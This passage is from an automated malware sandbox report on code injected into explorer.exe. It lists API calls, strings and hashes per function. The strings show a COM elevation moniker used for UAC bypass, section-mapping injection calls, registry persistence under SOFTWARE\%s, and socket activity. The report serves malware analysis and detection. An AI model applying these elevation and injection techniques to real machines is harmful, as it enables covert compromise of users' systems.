                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast_errno
                          • String ID:
                          • API String ID: 1012874770-0
                          • Opcode ID: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                          • Instruction ID: 30a898c57f3ac471ac024d96893acae59e796766c49ffa3e7826eaa03875a352
                          • Opcode Fuzzy Hash: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                          • Instruction Fuzzy Hash: 88815322A5154685DB49BF35C8F4BEE2331ABE8F4CF046132CA4DAB725CF21D84583D0
                          Function 011B64A0 Relevance: 72.2, APIs: 40, Strings: 1, Instructions: 439synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                          • String ID: 8
                          • API String ID: 3117981272-4194326291
                          • Opcode ID: 5867b1f840c82ca0895774d01bb670b5c5b517109d049e330d4ccd184464ac88
                          • Instruction ID: 1105049723ddb398698cc4bc6d343680c35633a69bb17ab9b63c3048700221ce
                          • Opcode Fuzzy Hash: 5867b1f840c82ca0895774d01bb670b5c5b517109d049e330d4ccd184464ac88
                          • Instruction Fuzzy Hash: 8732C632218B84C6E77ADB19E8883DAB360F7D8759F504229D6CA47B68DF7DC449CB01
                          Function 011911B0 Relevance: 66.7, APIs: 24, Strings: 14, Instructions: 176stringlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventW.KERNEL32 ref: 011911DF
                          • GetWindowsDirectoryW.KERNEL32 ref: 01191218
                          • CloseHandle.KERNEL32 ref: 0119157B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • GetCurrentDirectoryW.KERNEL32 ref: 0119128D
                          • LocalAlloc.KERNEL32 ref: 011912B1
                          • GetModuleHandleW.KERNEL32 ref: 011912D5
                          • GetProcAddress.KERNEL32 ref: 011912F2
                          • GetProcAddress.KERNEL32 ref: 01191312
                          • lstrcpyW.KERNEL32 ref: 0119133C
                          • lstrcpyW.KERNEL32 ref: 0119135A
                          • lstrcpyW.KERNEL32 ref: 01191379
                          • lstrcpyW.KERNEL32 ref: 01191397
                          • lstrcpyW.KERNEL32 ref: 011913B6
                          • lstrcpyA.KERNEL32 ref: 011913D4
                          • lstrcpyA.KERNEL32 ref: 011913F2
                          • lstrcpyA.KERNEL32 ref: 01191410
                          • lstrcpyA.KERNEL32 ref: 0119142E
                          • lstrcpyW.KERNEL32 ref: 0119144A
                          • lstrcpyW.KERNEL32 ref: 01191468
                            • Part of subcall function 01197940: GetCurrentProcess.KERNEL32 ref: 0119795D
                            • Part of subcall function 01197940: CreateProcessW.KERNEL32 ref: 01197A16
                            • Part of subcall function 01197940: NtCreateSection.NTDLL ref: 01197A71
                            • Part of subcall function 01197940: GetCurrentProcess.KERNEL32 ref: 01197AA7
                            • Part of subcall function 01197940: NtMapViewOfSection.NTDLL ref: 01197AFA
                            • Part of subcall function 01197940: NtMapViewOfSection.NTDLL ref: 01197B8F
                          • WaitForSingleObject.KERNEL32 ref: 011914FD
                          • TerminateProcess.KERNEL32 ref: 01191533
                          • CloseHandle.KERNEL32 ref: 01191541
                          • CloseHandle.KERNEL32 ref: 0119154F
                          • LocalFree.KERNEL32 ref: 01191568
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$HandleProcess$CloseCreateCurrentSection$AddressDirectoryLocalProcView$AllocEventFreeModuleObjectSingleTerminateWaitWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${094CBDBD-CA58-4DF6-999A-7FCC415A528A}${0F0641A2-3ABD-446F-81C5-65FC68B7C330}${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                          • API String ID: 3898657461-1743686038
                          • Opcode ID: 152ebfc4296a29c18ab4aff8e275f54060d5db617d5b791674a1e49d8749346c
                          • Instruction ID: 4d666e44946b276fe78250fecca0e864b47ec1624ad9551d807a28d7522cbdc9
                          • Opcode Fuzzy Hash: 152ebfc4296a29c18ab4aff8e275f54060d5db617d5b791674a1e49d8749346c
                          • Instruction Fuzzy Hash: 1EA12775205B8496EB68DF58F4883DAA3A2F7C4B94F404526DB8E43B68DF7DC069CB40
                          Function 01199FB0 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 165memoryCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 0119A060
                          • SetEvent.KERNEL32 ref: 0119A0CF
                          • LocalAlloc.KERNEL32 ref: 0119A10A
                          • wnsprintfW.SHLWAPI ref: 0119A14F
                          • OpenEventW.KERNEL32 ref: 0119A179
                          • SetEvent.KERNEL32 ref: 0119A19A
                          • CloseHandle.KERNEL32 ref: 0119A1A8
                          • LocalFree.KERNEL32 ref: 0119A1B6
                          • LocalFree.KERNEL32 ref: 0119A1C4
                          • shutdown.WS2_32 ref: 0119A1D4
                          • closesocket.WS2_32 ref: 0119A1DF
                          • LocalFree.KERNEL32 ref: 0119A364
                          • LocalFree.KERNEL32 ref: 0119A372
                          • shutdown.WS2_32 ref: 0119A382
                          • closesocket.WS2_32 ref: 0119A38D
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Event$AllocCreateErrorLastclosesocketshutdown$CloseDirectoryFileHandleOpensetsockoptwnsprintf
                          • String ID: "%s%s" %s$%s%s$Spotify.exe$h${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}
                          • API String ID: 3165817228-2947109659
                          • Opcode ID: 9bb3f62f99aaf1c74283b27014c8f82d3a511667c2aed13405528632937f526f
                          • Instruction ID: c988d0fe171fd97e0490f86dfb59351dd7d251b408f647cb6e6f5fad6b9bb4c8
                          • Opcode Fuzzy Hash: 9bb3f62f99aaf1c74283b27014c8f82d3a511667c2aed13405528632937f526f
                          • Instruction Fuzzy Hash: 3291C636108B8586EB789F15F8543DAB7A0F788758F504126EB9E47B68DF7CC189CB40
                          Function 011A51A0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 344registryfilememoryCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 011A5224
                          • RegCreateKeyExW.ADVAPI32 ref: 011A5371
                          • LocalAlloc.KERNEL32 ref: 011A5430
                          • _LDint.LIBCPMTD ref: 011A559C
                          • _LDint.LIBCPMTD ref: 011A55D1
                          • CreateFileW.KERNEL32 ref: 011A5634
                          • WriteFile.KERNEL32 ref: 011A567A
                          • RegCloseKey.ADVAPI32 ref: 011A5923
                          • LocalFree.KERNEL32 ref: 011A593C
                          • LocalFree.KERNEL32 ref: 011A5955
                          • LocalFree.KERNEL32 ref: 011A596E
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • shutdown.WS2_32 ref: 011A5995
                          • closesocket.WS2_32 ref: 011A59A0
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTimer$Free$ChangeConcurrency::details::platform::__CreateDintFileQueue$AllocCloseWrite_errno_invalid_parameter_noinfoclosesocketsetsockoptshutdown
                          • String ID: ?$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 2583228562-3633698240
                          • Opcode ID: 20311bd9fb185f7ad2a093369a74a139bfd9499374340ceb26e1eea1a4b5f445
                          • Instruction ID: c4c41b2f93f0d7be9264c3ed6f02b288219334c3938d5743e79d5fc3fcb2cb51
                          • Opcode Fuzzy Hash: 20311bd9fb185f7ad2a093369a74a139bfd9499374340ceb26e1eea1a4b5f445
                          • Instruction Fuzzy Hash: AD12173621CBC0C6D7B99B15E4443DAB7A5F389764F804226D6ED87B98DF78C189CB01
                          Function 011A4B80 Relevance: 49.2, APIs: 18, Strings: 10, Instructions: 242registryfileCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 011A4C04
                          • StrStrIW.SHLWAPI ref: 011A4E8C
                          • DeleteFileW.KERNEL32 ref: 011A4EBA
                          • LocalFree.KERNEL32 ref: 011A4EDD
                          • LocalFree.KERNEL32 ref: 011A4EEB
                          • RegDeleteKeyExW.ADVAPI32 ref: 011A4F40
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • StrStrIW.SHLWAPI ref: 011A4FA2
                          • DeleteFileW.KERNEL32 ref: 011A4FD0
                          • LocalFree.KERNEL32 ref: 011A4FF3
                          • LocalFree.KERNEL32 ref: 011A5001
                          • StrStrIW.SHLWAPI ref: 011A503B
                          • RegOpenKeyExW.ADVAPI32 ref: 011A50C8
                          • RegDeleteValueW.ADVAPI32 ref: 011A50E2
                          • RegCloseKey.ADVAPI32 ref: 011A5104
                          • LocalFree.KERNEL32 ref: 011A5112
                          • LocalFree.KERNEL32 ref: 011A5120
                          • shutdown.WS2_32 ref: 011A5179
                          • closesocket.WS2_32 ref: 011A5184
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$DeleteTimer$AllocChangeConcurrency::details::platform::__FileQueuewnsprintf$CloseOpenValueclosesocketsetsockoptshutdown
                          • String ID: $!$"$#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 1601551040-1569939418
                          • Opcode ID: e79f0dd00376b003c735c67edfd53d585d1f39080c862a119f6a1facfcbffdb6
                          • Instruction ID: c3f87969268c79b1377a55450f809d6ac5843df4801cc0109ecd9260bb033cb1
                          • Opcode Fuzzy Hash: e79f0dd00376b003c735c67edfd53d585d1f39080c862a119f6a1facfcbffdb6
                          • Instruction Fuzzy Hash: 4ED1CE76209BC58AE774DF15E8843DAB7A1F3C4758F40412ADA8987A9ADFBDC049CF40
                          Function 011B607B Relevance: 45.2, APIs: 30, Instructions: 156synchronizationmemorythreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                          • String ID:
                          • API String ID: 2113405211-0
                          • Opcode ID: 72f5757a7a376f687d51f61d8741ea54f6f949050126bff93f44ef60b437c021
                          • Instruction ID: 1e1389f785ad0d2bc6589ce37d3aafe279059a069344eb3c5e8f1afd57d83ee3
                          • Opcode Fuzzy Hash: 72f5757a7a376f687d51f61d8741ea54f6f949050126bff93f44ef60b437c021
                          • Instruction Fuzzy Hash: 9691CD31108E4482E71CAF55F8983DAB7A1F7D4758F545139E78A86AB8CFBDC48ACB01
                          Function 011A6D70 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 246registrymemorystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocalValue$lstrcpy
                          • String ID: .DLL$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 2708694652-2548481518
                          • Opcode ID: 2348beeeb3ace8f3efc143e333d405a207f50077d86310ab65bc4b18a82b5d72
                          • Instruction ID: f14cda96b10dda8dfc105c362f061e8f430904dde48b455d6466ac53132a5372
                          • Opcode Fuzzy Hash: 2348beeeb3ace8f3efc143e333d405a207f50077d86310ab65bc4b18a82b5d72
                          • Instruction Fuzzy Hash: CDD10936208AC582D779DB15F4983DAB7A5F7C8754F800126EB8987BA8DF7CC685CB40
                          Function 011C22FC Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                          • API String ID: 2643518689-564504941
                          • Opcode ID: 7090a6912252181c11309324482eece1369c3d73ab31ba803f76b70732032b00
                          • Instruction ID: 88b8e0c57e6f4dfcb3ff9aa269cdea8249ac0ae83a0be88c094b93a1b8c8db1d
                          • Opcode Fuzzy Hash: 7090a6912252181c11309324482eece1369c3d73ab31ba803f76b70732032b00
                          • Instruction Fuzzy Hash: E851F430246B1287FE1DDB5AF9987E4A7A1AB99F94F480529DE0E47760EF7CC086C350
                          Function 011A0330 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 109sleepregistrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {879A1041-844E-4627-80AA-671B6A2BAF85}, xrefs: 011A0392
                          • Software\%s, xrefs: 011A056D
                          • %s\%s, xrefs: 011A0446
                          • {B3B950ED-5348-42C3-8F9D-35ED97437688}, xrefs: 011A0432
                          • {B460010D-5A49-4128-956F-F4F85783CDFC}, xrefs: 011A0343
                          • {DAAFDD52-2BC1-4ADF-98A5-0925A79F94FC}, xrefs: 011A0566
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWaitlstrlenwnsprintf
                          • String ID: %s\%s$Software\%s${879A1041-844E-4627-80AA-671B6A2BAF85}${B3B950ED-5348-42C3-8F9D-35ED97437688}${B460010D-5A49-4128-956F-F4F85783CDFC}${DAAFDD52-2BC1-4ADF-98A5-0925A79F94FC}
                          • API String ID: 896765885-1487312853
                          • Opcode ID: aa61388fdc8b11f3591512eaecf8e0fd313092e702345adb2aa1c8fe6131f3b2
                          • Instruction ID: 7e437ce3e791eedce97b8a849d397bcb5c279b31aff62656e3c8155a846b75ae
                          • Opcode Fuzzy Hash: aa61388fdc8b11f3591512eaecf8e0fd313092e702345adb2aa1c8fe6131f3b2
                          • Instruction Fuzzy Hash: B051FB75218AC4C1E778EF15E8543DA73A5FBC8754F408125E7DA82AA8DF3DC54ACB80
                          Function 011A33C0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 217memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$Path$AllocFolderKnownTask$DintDirectoryTempWindows_errno_invalid_parameter_noinfo
                          • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                          • API String ID: 4190533178-4258658051
                          • Opcode ID: 9d299084846ee36301d4091e611f11500f5bdb191849758f0b1889b946ce3dcf
                          • Instruction ID: 46d6fbbeacd930d1f490e5a50c92889b663b1bc30b36ef2c9eb20e83c8817ea0
                          • Opcode Fuzzy Hash: 9d299084846ee36301d4091e611f11500f5bdb191849758f0b1889b946ce3dcf
                          • Instruction Fuzzy Hash: B5C10776218AC586DB78DF14E8983EAB764F7C4B49F900226D68E47B68DF7CC446CB04
                          Function 0119B5A0 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 126memoryprocessCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 0119B650
                          • SetEvent.KERNEL32 ref: 0119B6BF
                          • LocalAlloc.KERNEL32 ref: 0119B6CF
                          • wnsprintfW.SHLWAPI ref: 0119B73F
                          • LocalAlloc.KERNEL32 ref: 0119B74F
                          • wnsprintfW.SHLWAPI ref: 0119B794
                          • CreateProcessW.KERNEL32 ref: 0119B803
                          • LocalFree.KERNEL32 ref: 0119B818
                          • LocalFree.KERNEL32 ref: 0119B826
                          • LocalFree.KERNEL32 ref: 0119B834
                          • OpenEventW.KERNEL32 ref: 0119B848
                          • SetEvent.KERNEL32 ref: 0119B869
                          • CloseHandle.KERNEL32 ref: 0119B877
                          • shutdown.WS2_32 ref: 0119B887
                          • closesocket.WS2_32 ref: 0119B892
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
